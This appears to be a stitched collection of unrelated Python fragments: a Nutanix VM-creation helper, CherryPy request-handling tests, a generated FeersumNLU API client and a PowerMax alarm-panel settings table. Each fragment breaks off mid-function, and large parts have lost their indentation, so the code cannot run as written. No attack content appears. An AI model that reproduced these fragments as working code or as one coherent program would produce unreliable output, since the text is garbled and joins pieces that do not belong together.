return result_json['metadata']['uuid']
return False
def create_vm_simple(self,
                     vm_name,
                     vm_description,
                     cluster_uuid,
                     project_uuid,
                     owner_uuid,
                     source_image_uuid,
                     subnet_uuid,
                     num_threads_per_core=1,
                     num_vcpus_per_socket=1,
                     num_sockets=1,
                     memory_size_mib=1024,
                     template_dir=".",
                     network_cfg=None
                     ):
    """
    Creates a basic VM in Nutanix. The VM is created from a Nutanix image.

    Args:
        vm_name (string): desired name of VM (hostname)
        vm_description (string): description of VM
        cluster_uuid (string): uuid of cluster where to deploy VM
        project_uuid (string): uuid of project which will own VM
        owner_uuid (string): uuid of VM owner (of creating user)
        source_image_uuid (string): OS image uuid
        subnet_uuid (uuid): uuid of vm subnet
        num_threads_per_core (int, optional): Number of threads per CPU. Defaults to 1.
        num_vcpus_per_socket (int, optional): Number of vcpus per socket. Defaults to 1.
        num_sockets (int, optional): Number of CPU sockets. Defaults to 1.
        memory_size_mib (int, optional): How much memory VM will get. Defaults to 1024.
        template_dir: path where cloud-init templates are stored (not inside version control!)
        network_cfg (optional): network configuration. Defaults to None.
            There are three cases in Nutanix:
            network_cfg = None
                Assign ip address automatically via DHCP.
                Must be used only on networks managed by Nutanix.
            network_cfg (String) = ip_address
                Assign the specified ip_address via Nutanix. Netmask and gateway
                are inherited from the network definition.
                Must be used on networks managed by Nutanix, otherwise it fails
                (with error "Cannot assign IP address in unmanaged network").
            network_cfg (Dictionary) =
                { ip_address (String)
                  prefix (String)
                  default_gw (String)
                  dns_server1 (String)
                  dns_server2 (String)
                  dns_search (String)
                }
                Sets the network according to the dictionary.
                Must be used for networks not managed by Nutanix.
    Returns:
        requests.Response on success, False on failure or bad network_cfg
    """
    # The shape of network_cfg selects both the cloud-init payload and the
    # nic ip_endpoint_list entry (see the three cases in the docstring).
    if network_cfg is None: #if no IP address is not specified , using DHCP
        user_data=self._prepare_user_data_managed(template_dir,network_cfg)
        ip_endpoint_list=[{ "ip_type":"DHCP" }]
    elif isinstance(network_cfg,str): #if parameter is simple string
        user_data=self._prepare_user_data_managed(template_dir,network_cfg)
        ip_endpoint_list=[{
            "ip": network_cfg, #!!! need validation or exception?
            "type": "ASSIGNED"
        }]
    elif isinstance(network_cfg,dict):
        user_data=self._prepare_user_data_unmanaged(template_dir,network_cfg)
        ip_endpoint_list=[{ "type": "ASSIGNED"}]
    else: #error
        return False
    # v3 API VM payload: one SCSI system disk cloned from the image plus an
    # IDE CDROM, a single NIC, guest tools enabled, cloud-init customization.
    data = {
        "spec": {
            #"api_version": "3.1.0",
            "name": vm_name,
            "description": vm_description,
            "resources": {
                "num_threads_per_core": num_threads_per_core,
                "memory_size_mib": memory_size_mib,
                "disk_list":[{
                    "device_properties":{
                        "device_type":"DISK",
                        "disk_address":
                        {
                            "device_index": 0,
                            "adapter_type": "SCSI"
                        }
                    },
                    "data_source_reference": {
                        "kind": "image",
                        "uuid": source_image_uuid
                    }
                },
                {
                    "device_properties":{
                        "disk_address": {
                            "adapter_type": "IDE",
                            "device_index": 1
                        },
                        "device_type":"CDROM"
                    }}
                ], #end disk list
                "num_vcpus_per_socket": num_vcpus_per_socket,
                "num_sockets": num_sockets,
                "nic_list":[{
                    "nic_type":"NORMAL_NIC",
                    "is_connected": True,
                    "ip_endpoint_list":ip_endpoint_list,
                    "subnet_reference":{
                        "kind":"subnet",
                        "uuid": subnet_uuid
                    }
                }],
                "guest_tools":{
                    "nutanix_guest_tools":{
                        "state":"ENABLED",
                        "iso_mount_state":"MOUNTED"
                    }
                },
                "guest_customization": {
                    "cloud_init": {
                        "user_data": user_data
                    },
                    "is_overridable": False
                },
            }, #end respources
            "cluster_reference": {
                "kind": "cluster",
                "uuid": cluster_uuid
            }
        }, #end spec
        "metadata": {
            "kind": "vm",
            "project_reference": {
                "kind": "project",
                "uuid": project_uuid
            },
            "owner_reference": {
                "kind": "user",
                "uuid": owner_uuid
            },
            #"categories": {},
            "name": vm_name
        }
    }
    logging.debug("create_vm_simple data:")
    logging.debug(data)
    response=self.rest_call('POST','vms',data)
    # 202 Accepted is the normal async-create reply from the v3 API.
    if response.status_code == 200 or response.status_code == 202:
        logging.debug("create_vm_simple call success")
        return response
    logging.debug("create_vm_simple call failed")
    logging.debug(repr(response))
    return False
def _get_uuid_by_name(self,response,search_name):
"""
Goes through entities returned in response
If finds entity which name mathes search_name return uuid of this entity
If many entities match search_criteria - it is error and false is returned
Args:
response:
search_name: string
Returns:
string: with uuid of named entity
"""
uuid=False
try:
result_json = json.loads(response.content)
search_result=list(filter(lambda x: x['spec']['name'] == search_name,result_json['entities']))
if len(list(search_result))==1:
uuid=search_result[0]['metadata']['uuid']
else:
uuid=False #not found or duplicates
except json.JSONDecodeError as ex:
print("Invalid json")
print(f"Content: {response.content}")
uuid=False
except BaseException as ex: #in case of ANY error , image is not found return False
print("Unknown exception")
print(f"{repr(ex)}")
uuid=False
return uuid
def _print_entities(self,response):
"""
prints basic attributes for entities from respones
using for exploration and testing
Args:
response requests.Response: response received from web server
"""
result_json = json.loads(response.content)
for entity in result_json['entities']:
print(f"spec_name: {entity['spec']['name']} ent_name: {entity['status']['name']} uuid: {entity['metadata']['uuid']}")
def get_vm(self,vm_uuid):
#"bebb4394-0073-4864-9c67-29db86e1c77d"
data={
"kind":"vm",
"length":self.max_results,
}
logging.debug("get_vm data:{repr(data)}")
request_url='vms/%s' % vm_uuid
logging.debug(f"request_url: {request_url}")
response=self.rest_call('GET',request_url,data)
result_json=None
if response.status_code == 200:
result_json = json.loads(response.content ,encoding='utf-8')
return result_json
def get_disk0(self,vm_uuid):
"""
from device list filter out device of type SCSI and device index 0
which must be system disk
Args:
vm_uuid String: UUID of VM
returns:
dictinary of disk object
as Example:
{
'uuid': 'e194e540-d3b6-4668-a19f-bf98cb0ba140',
'disk_size_bytes': 2361393152,
'storage_config': { 'storage_container_reference': {'kind': 'storage_container','uuid': '527ce9b6-a154-4f31-85b3-6fc7cfd2db44','name': 'SelfServiceContainer'}},
'device_properties': {'disk_address': {'device_index': 0,'adapter_type': 'SCSI'},'device_type': 'DISK'},
'data_source_reference': {'kind': | |
"""Basic tests for the CherryPy core: request handling."""
from cherrypy.test import test
test.prefer_parent_path()
import cherrypy
from cherrypy import _cptools, tools
from cherrypy.lib import http, static
import types
import os
localDir = os.path.dirname(__file__)
log_file = os.path.join(localDir, "test.log")
log_access_file = os.path.join(localDir, "access.log")
favicon_path = os.path.join(os.getcwd(), localDir, "../favicon.ico")
defined_http_methods = ("OPTIONS", "GET", "HEAD", "POST", "PUT", "DELETE",
"TRACE", "CONNECT", "PROPFIND")
def setup_server():
    """Build the CherryPy object tree used by the request-handling tests.

    Each nested class below handles one URL prefix; the TestType metaclass
    auto-exposes their methods and attaches an instance to `root` under the
    lowercased class name.  Global and per-app config is applied at the end,
    then the tree is mounted.
    """
    class Root:
        def index(self):
            return "hello"
        index.exposed = True

        favicon_ico = tools.staticfile.handler(filename=favicon_path)

        def andnow(self):
            return "the larch"
        andnow.exposed = True

        def global_(self):
            pass
        global_.exposed = True

        def delglobal(self):
            # Removes the global_ handler from the class at runtime.
            del self.__class__.__dict__['global_']
        delglobal.exposed = True

        def defct(self, newct):
            # Force a default Content-Type via the response_headers tool.
            newct = "text/%s" % newct
            cherrypy.config.update({'tools.response_headers.on': True,
                                    'tools.response_headers.headers':
                                    [('Content-Type', newct)]})
        defct.exposed = True

        def upload(self, file):
            return "Size: %s" % len(file.file.read())
        upload.exposed = True
    root = Root()

    class TestType(type):
        """Metaclass which automatically exposes all functions in each subclass,
        and adds an instance of the subclass as an attribute of root.
        """
        def __init__(cls, name, bases, dct):
            # NOTE(review): type.__init__ is called without `cls` as its first
            # argument; it happens to work because type.__init__ tolerates the
            # arguments, but `type.__init__(cls, name, bases, dct)` looks like
            # the intended call -- confirm before changing.
            type.__init__(name, bases, dct)
            for value in dct.itervalues():
                if isinstance(value, types.FunctionType):
                    value.exposed = True
            setattr(root, name.lower(), cls())
    class Test(object):
        # Python 2 metaclass hook: every subclass is auto-exposed and
        # attached to root (see TestType above).
        __metaclass__ = TestType

    class URL(Test):
        _cp_config = {'tools.trailing_slash.on': False}

        def index(self, path_info, relative=None):
            return cherrypy.url(path_info, relative=bool(relative))

        def leaf(self, path_info, relative=None):
            return cherrypy.url(path_info, relative=bool(relative))

    class Params(Test):
        def index(self, thing):
            return repr(thing)

        def ismap(self, x, y):
            return "Coordinates: %s, %s" % (x, y)

        def default(self, *args, **kwargs):
            return "args: %s kwargs: %s" % (args, kwargs)

    class Status(Test):
        def index(self):
            return "normal"

        def blank(self):
            cherrypy.response.status = ""

        # According to RFC 2616, new status codes are OK as long as they
        # are between 100 and 599.

        # Here is an illegal code...
        def illegal(self):
            cherrypy.response.status = 781
            return "oops"

        # ...and here is an unknown but legal code.
        def unknown(self):
            cherrypy.response.status = "431 My custom error"
            return "funky"

        # Non-numeric code
        def bad(self):
            cherrypy.response.status = "error"
            return "bad news"

    class Redirect(Test):
        class Error:
            _cp_config = {"tools.err_redirect.on": True,
                          "tools.err_redirect.url": "/errpage",
                          "tools.err_redirect.internal": False,
                          }

            def index(self):
                raise NameError("redirect_test")
            index.exposed = True
        error = Error()

        def index(self):
            return "child"

        def by_code(self, code):
            raise cherrypy.HTTPRedirect("somewhere else", code)
        by_code._cp_config = {'tools.trailing_slash.extra': True}

        def nomodify(self):
            raise cherrypy.HTTPRedirect("", 304)

        def proxy(self):
            raise cherrypy.HTTPRedirect("proxy", 305)

        def stringify(self):
            return str(cherrypy.HTTPRedirect("/"))

        def fragment(self, frag):
            raise cherrypy.HTTPRedirect("/some/url#%s" % frag)

    def login_redir():
        # Tool hook: bounce anonymous requests to the login page.
        if not getattr(cherrypy.request, "login", None):
            raise cherrypy.InternalRedirect("/internalredirect/login")
    tools.login_redir = _cptools.Tool('before_handler', login_redir)

    def redir_custom():
        raise cherrypy.InternalRedirect("/internalredirect/custom_err")

    class InternalRedirect(Test):
        def index(self):
            raise cherrypy.InternalRedirect("/")

        def relative(self, a, b):
            raise cherrypy.InternalRedirect("cousin?t=6")

        def cousin(self, t):
            assert cherrypy.request.prev.closed
            return cherrypy.request.prev.query_string

        def petshop(self, user_id):
            if user_id == "parrot":
                # Trade it for a slug when redirecting
                raise cherrypy.InternalRedirect('/image/getImagesByUser?user_id=slug')
            elif user_id == "terrier":
                # Trade it for a fish when redirecting
                raise cherrypy.InternalRedirect('/image/getImagesByUser?user_id=fish')
            else:
                # This should pass the user_id through to getImagesByUser
                raise cherrypy.InternalRedirect('/image/getImagesByUser?user_id=%s' % user_id)

        # We support Python 2.3, but the @-deco syntax would look like this:
        # @tools.login_redir()
        def secure(self):
            return "Welcome!"
        secure = tools.login_redir()(secure)
        # Since calling the tool returns the same function you pass in,
        # you could skip binding the return value, and just write:
        # tools.login_redir()(secure)

        def login(self):
            return "Please log in"
        login._cp_config = {'hooks.before_error_response': redir_custom}

        def custom_err(self):
            return "Something went horribly wrong."

        def early_ir(self, arg):
            return "whatever"
        early_ir._cp_config = {'hooks.before_request_body': redir_custom}

    class Image(Test):
        def getImagesByUser(self, user_id):
            return "0 images for %s" % user_id

    class Flatten(Test):
        def as_string(self):
            return "content"

        def as_list(self):
            return ["con", "tent"]

        def as_yield(self):
            yield "content"

        def as_dblyield(self):
            # Yields a generator; the flatten tool unrolls it.
            yield self.as_yield()
        as_dblyield._cp_config = {'tools.flatten.on': True}

        def as_refyield(self):
            for chunk in self.as_yield():
                yield chunk

    class Error(Test):
        _cp_config = {'tools.log_tracebacks.on': True,
                      }

        def custom(self):
            raise cherrypy.HTTPError(404, "No, <b>really</b>, not found!")
        custom._cp_config = {'error_page.404': os.path.join(localDir, "static/index.html")}

        def noexist(self):
            raise cherrypy.HTTPError(404, "No, <b>really</b>, not found!")
        noexist._cp_config = {'error_page.404': "nonexistent.html"}

        def page_method(self):
            raise ValueError()

        def page_yield(self):
            yield "howdy"
            raise ValueError()

        def page_streamed(self):
            yield "word up"
            raise ValueError()
            yield "very oops"  # unreachable: the ValueError above always fires
        page_streamed._cp_config = {"response.stream": True}

        def cause_err_in_finalize(self):
            # Since status must start with an int, this should error.
            cherrypy.response.status = "ZOO OK"
        cause_err_in_finalize._cp_config = {'request.show_tracebacks': False}

        def rethrow(self):
            """Test that an error raised here will be thrown out to the server."""
            raise ValueError()
        rethrow._cp_config = {'request.throw_errors': True}

    class Ranges(Test):
        def get_ranges(self, bytes):
            return repr(http.get_ranges('bytes=%s' % bytes, 8))

        def slice_file(self):
            path = os.path.join(os.getcwd(), os.path.dirname(__file__))
            return static.serve_file(os.path.join(path, "static/index.html"))

    class Expect(Test):
        def expectation_failed(self):
            expect = cherrypy.request.headers.elements("Expect")
            if expect and expect[0].value != '100-continue':
                raise cherrypy.HTTPError(400)
            raise cherrypy.HTTPError(417, 'Expectation Failed')

    class Headers(Test):
        def default(self, headername):
            """Spit back out the value for the requested header."""
            return cherrypy.request.headers[headername]

        def doubledheaders(self):
            # From http://www.cherrypy.org/ticket/165:
            # "header field names should not be case sensitive sayes the rfc.
            # if i set a headerfield in complete lowercase i end up with two
            # header fields, one in lowercase, the other in mixed-case."

            # Set the most common headers
            hMap = cherrypy.response.headers
            hMap['content-type'] = "text/html"
            hMap['content-length'] = 18
            hMap['server'] = 'CherryPy headertest'
            hMap['location'] = ('%s://%s:%s/headers/'
                                % (cherrypy.request.local.ip,
                                   cherrypy.request.local.port,
                                   cherrypy.request.scheme))

            # Set a rare header for fun
            hMap['Expires'] = 'Thu, 01 Dec 2194 16:00:00 GMT'

            return "double header test"

        def ifmatch(self):
            val = cherrypy.request.headers['If-Match']
            cherrypy.response.headers['ETag'] = val
            return repr(val)

    class HeaderElements(Test):
        def get_elements(self, headername):
            e = cherrypy.request.headers.elements(headername)
            return "\n".join([unicode(x) for x in e])

    class Method(Test):
        def index(self):
            m = cherrypy.request.method
            if m in defined_http_methods:
                return m

            if m == "LINK":
                raise cherrypy.HTTPError(405)
            else:
                raise cherrypy.HTTPError(501)

        def parameterized(self, data):
            return data

        def request_body(self):
            # This should be a file object (temp file),
            # which CP will just pipe back out if we tell it to.
            return cherrypy.request.body

        def reachable(self):
            return "success"

    class Divorce:
        """HTTP Method handlers shouldn't collide with normal method names.
        For example, a GET-handler shouldn't collide with a method named 'get'.

        If you build HTTP method dispatching into CherryPy, rewrite this class
        to use your new dispatch mechanism and make sure that:
            "GET /divorce HTTP/1.1" maps to divorce.index() and
            "GET /divorce/get?ID=13 HTTP/1.1" maps to divorce.get()
        """

        documents = {}

        def index(self):
            yield "<h1>Choose your document</h1>\n"
            yield "<ul>\n"
            for id, contents in self.documents.iteritems():
                yield (" <li><a href='/divorce/get?ID=%s'>%s</a>: %s</li>\n"
                       % (id, id, contents))
            yield "</ul>"
        index.exposed = True

        def get(self, ID):
            return ("Divorce document %s: %s" %
                    (ID, self.documents.get(ID, "empty")))
        get.exposed = True
    root.divorce = Divorce()

    class Cookies(Test):
        def single(self, name):
            cookie = cherrypy.request.cookie[name]
            cherrypy.response.cookie[name] = cookie.value

        def multiple(self, names):
            for name in names:
                cookie = cherrypy.request.cookie[name]
                cherrypy.response.cookie[name] = cookie.value

    class ThreadLocal(Test):
        def index(self):
            # Returns whatever was already stored on this request-local,
            # then pollutes it -- proves request objects aren't reused.
            existing = repr(getattr(cherrypy.request, "asdf", None))
            cherrypy.request.asdf = "rassfrassin"
            return existing

    # Global server configuration (small limits to exercise 413/400 paths).
    cherrypy.config.update({
        'log.error_file': log_file,
        'environment': 'test_suite',
        'server.max_request_body_size': 200,
        'server.max_request_header_size': 500,
        })

    # Per-application configuration.
    appconf = {
        '/': {'log.access_file': log_access_file},
        '/method': {'request.methods_with_bodies': ("POST", "PUT", "PROPFIND")},
        }
    cherrypy.tree.mount(root, config=appconf)
# Client-side code #
from cherrypy.test import helper
class CoreRequestHandlingTest(helper.CPWebCase):
    def testParams(self):
        """Query-string decoding: repeated params, %-escapes and <img ismap>."""
        self.getPage("/params/?thing=a")
        self.assertBody("'a'")

        # A repeated key is collected into a list.
        self.getPage("/params/?thing=a&thing=b&thing=c")
        self.assertBody("['a', 'b', 'c']")

        # Test friendly error message when given params are not accepted.
        ignore = helper.webtest.ignored_exceptions
        ignore.append(TypeError)
        try:
            self.getPage("/params/?notathing=meeting")
            self.assertInBody("index() got an unexpected keyword argument 'notathing'")
        finally:
            ignore.pop()

        # Test "% HEX HEX"-encoded URL, param keys, and values
        self.getPage("/params/%d4%20%e3/cheese?Gruy%E8re=Bulgn%e9ville")
        self.assertBody(r"args: ('\xd4 \xe3', 'cheese') "
                        r"kwargs: {'Gruy\xe8re': 'Bulgn\xe9ville'}")

        # Make sure that encoded = and & get parsed correctly
        self.getPage("/params/code?url=http%3A//cherrypy.org/index%3Fa%3D1%26b%3D2")
        self.assertBody(r"args: ('code',) "
                        r"kwargs: {'url': 'http://cherrypy.org/index?a=1&b=2'}")

        # Test coordinates sent by <img ismap>
        self.getPage("/params/ismap?223,114")
        self.assertBody("Coordinates: 223, 114")
    def testStatus(self):
        """Status handling: normal, blank, out-of-range, unknown, non-numeric."""
        self.getPage("/status/")
        self.assertBody('normal')
        self.assertStatus(200)

        # An empty status string falls back to a plain 200.
        self.getPage("/status/blank")
        self.assertBody('')
        self.assertStatus(200)

        # 781 is numeric but outside the 100-599 range allowed by RFC 2616,
        # so the server must refuse it with a 500 error page.
        self.getPage("/status/illegal")
        self.assertStatus(500)
        msg = "Illegal response status from server (781 is out of range)."
        self.assertErrorPage(500, msg)

        # 431 is unknown but legal, so it passes straight through.
        self.getPage("/status/unknown")
        self.assertBody('funky')
        self.assertStatus(431)

        # A non-numeric status string is also rejected with a 500.
        self.getPage("/status/bad")
        self.assertStatus(500)
        msg = "Illegal response status from server ('error' is non-numeric)."
        self.assertErrorPage(500, msg)
def testLogging(self):
f = open(log_access_file, "wb")
f.write("")
f.close()
f = open(log_file, "wb")
f.write("")
f.close()
self.getPage("/flatten/as_string")
self.assertBody('content')
self.assertStatus(200)
self.getPage("/flatten/as_yield")
self.assertBody('content')
self.assertStatus(200)
data = | |
# coding: utf-8
"""
FeersumNLU API
This is the HTTP API for Feersum NLU. See https://github.com/praekelt/feersum-nlu-api-wrappers for examples of how to use the API. # noqa: E501
OpenAPI spec version: 2.0.54.dev2
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from feersum_nlu.api_client import ApiClient
class DucklingEntityExtractorsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def duckling_entity_extractor_create(self, create_details, **kwargs): # noqa: E501
"""Create a duckling entity extractor. # noqa: E501
Create a new duckling entity extractor or reload one from the trash. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.duckling_entity_extractor_create(create_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DucklingEntityExtractorCreateDetails create_details: The details of the instance to create. (required)
:param str x_caller:
:return: DucklingEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.duckling_entity_extractor_create_with_http_info(create_details, **kwargs) # noqa: E501
else:
(data) = self.duckling_entity_extractor_create_with_http_info(create_details, **kwargs) # noqa: E501
return data
def duckling_entity_extractor_create_with_http_info(self, create_details, **kwargs): # noqa: E501
"""Create a duckling entity extractor. # noqa: E501
Create a new duckling entity extractor or reload one from the trash. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.duckling_entity_extractor_create_with_http_info(create_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DucklingEntityExtractorCreateDetails create_details: The details of the instance to create. (required)
:param str x_caller:
:return: DucklingEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_details', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method duckling_entity_extractor_create" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_details' is set
if ('create_details' not in params or
params['create_details'] is None):
raise ValueError("Missing the required parameter `create_details` when calling `duckling_entity_extractor_create`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'create_details' in params:
body_params = params['create_details']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/duckling_entity_extractors', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DucklingEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def duckling_entity_extractor_del(self, instance_name, **kwargs): # noqa: E501
"""Delete named instance. # noqa: E501
Delete and return the details of the named duckling entity extractor instance. Deleted models can be reloaded from the trash with the create operation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.duckling_entity_extractor_del(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: DucklingEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.duckling_entity_extractor_del_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.duckling_entity_extractor_del_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def duckling_entity_extractor_del_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Delete named instance. # noqa: E501
Delete and return the details of the named duckling entity extractor instance. Deleted models can be reloaded from the trash with the create operation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.duckling_entity_extractor_del_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: DucklingEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method duckling_entity_extractor_del" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `duckling_entity_extractor_del`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/duckling_entity_extractors/{instance_name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DucklingEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def duckling_entity_extractor_get_details(self, instance_name, **kwargs): # noqa: E501
"""Get details of named instance. # noqa: E501
Get the details of the named duckling entity extractor instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.duckling_entity_extractor_get_details(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: DucklingEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.duckling_entity_extractor_get_details_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.duckling_entity_extractor_get_details_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def duckling_entity_extractor_get_details_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Get details of named instance. # noqa: E501
Get the details of the named duckling entity extractor instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.duckling_entity_extractor_get_details_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: DucklingEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method duckling_entity_extractor_get_details" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `duckling_entity_extractor_get_details`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/duckling_entity_extractors/{instance_name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DucklingEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def duckling_entity_extractor_get_details_all(self, **kwargs): # noqa: E501
"""Get list of regular expression entity extractors. # noqa: E501
Get the list of duckling entity extractors. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.duckling_entity_extractor_get_details_all(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_caller:
:return: list[DucklingEntityExtractorInstanceDetail]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.duckling_entity_extractor_get_details_all_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.duckling_entity_extractor_get_details_all_with_http_info(**kwargs) # noqa: E501
return data
def duckling_entity_extractor_get_details_all_with_http_info(self, | |
),
"x10Lockout" : SettingsCommand( True, 1, "TIME", 16, 532, 16, 0, -1, "X10 Lockout Time (start HH:MM)", {} ),
"x10Phase" : SettingsCommand( True, 1, "BYTE", 8, 748, 8, 0, -1, "X10 3 Phase and frequency", { '0':"Disable", '1':"50 Hz", '2':"60 Hz"} ),
"panelSerialCode": SettingsCommand( False, 1, "BYTE", 8,0x437, 8, 0, -1, "Panel Serial Code", {} ), # page 4 offset 55
"panelTypeCode" : SettingsCommand( False, 1, "BYTE", 8,0x436, 8, 0, -1, "Panel Code Type", {} ), # page 4 offset 54 and 55 ->> Panel type code
"panelSerial" : SettingsCommand( True, 1, "CODE", 48,0x430, 48, 0, -1, "Panel Serial", {} ), # page 4 offset 48
# ZONES
"zoneNameRaw" : SettingsCommand( False,31, "STRING", 0x80, 0x1900, 0x80, 0x10, -1, "Zone name <x>", {} ),
"panelEprom" : SettingsCommand( True, 1, "STRING", 128, 0x400, 128, 0, -1, "Panel Eprom", {} ),
"panelSoftware" : SettingsCommand( True, 1, "STRING", 144, 0x410, 144, 0, -1, "Panel Software", {} )
}
# { count:31, name:"", type:"STRING", size:0x80, poff:0x1900, psize:0x80, pstep:0x10 }
pmPanelName_t = {
"0000" : "PowerMax", "0001" : "PowerMax LT", "0004" : "PowerMax A", "0005" : "PowerMax", "0006" : "PowerMax LT",
"0009" : "PowerMax B", "000a" : "PowerMax A", "000b" : "PowerMax", "000c" : "PowerMax LT", "000f" : "PowerMax B",
"0014" : "PowerMax A", "0015" : "PowerMax", "0016" : "PowerMax", "0017" : "PowerArt", "0018" : "PowerMax SC",
